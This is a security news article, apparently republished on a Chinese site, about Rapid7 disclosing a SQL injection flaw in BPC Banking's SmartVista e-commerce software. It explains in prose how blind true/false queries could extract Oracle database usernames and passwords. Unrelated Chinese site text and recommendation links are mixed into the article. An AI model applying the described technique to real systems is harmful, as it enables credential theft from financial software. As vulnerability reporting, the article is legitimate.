Rapid7 has gone public with news of an e-commerce SQL injection vulnerability, saying it couldn’t raise a response from the vendor.
互联网安全之软件下载
The software in question, SmartVista, is an e-commerce and financial product from BPC Banking, and in this post, Rapid7 says it told the company about the issue back in May 2017.
The US CERT Coordination Centre and SwissCERT joined the security company’s effort to alert the Switzerland-based vendor in July and August, ahead of yesterday’s disclosure.
While exploiting the vulnerability needs authenticated access to the front end (SmartVista’s transactions), the attacker can pass through to much more sensitive data: “A successful exploitation can yield sensitive data, including usernames and passwords of the database backend”.

That’s because the front end doesn’t sanitise the card number or account number input fields used in the transaction module.
An attacker adept at scripting could go a long way, the post explains:
“To access usernames and encrypted passwords in the DBA_USERS table of database SYS (Oracle specific), one could craft a series of database queries to ask true/false statements such as ‘Does the first character, of the first row, in the user’s column start with a?’
“On a true response, the transaction values would be returned, indicating that the first character does indeed start with ‘a’. On a false reply, no data would be returned, and the automated system could move on to the next character. This could continue until the full username has been discovered, as well as the password.”
公司的安全管理人员的启示是加强各类系统用户密码的复杂度、账户锁定策略、入侵检测,并且加强各设备系统的访问控制规则,远程管理一定不要对所有互联网IP地址放开。
Since there’s no public acknowledgement of the bug, Rapid7 suggests companies using the software contact BPC Banking. Suitable Web application firewalls could help block SQL injection attempts. ®
Sponsored:
The Joy and Pain of Buying IT – Have Your Say
技术是双刃剑,技术人员小心别触犯了法律,得罪了政府,搞不好害自己坐了牢。

猜您喜欢

当心这6种行为,会让你的社会保障卡失效 你犯过几个?
网络安全公益短片防范社工电话诈骗
Security-Frontline-安全前线
全球35名侏儒儿童相见欢
LILISKITCHEN ANSECURE
打击猖獗的商业间谍活动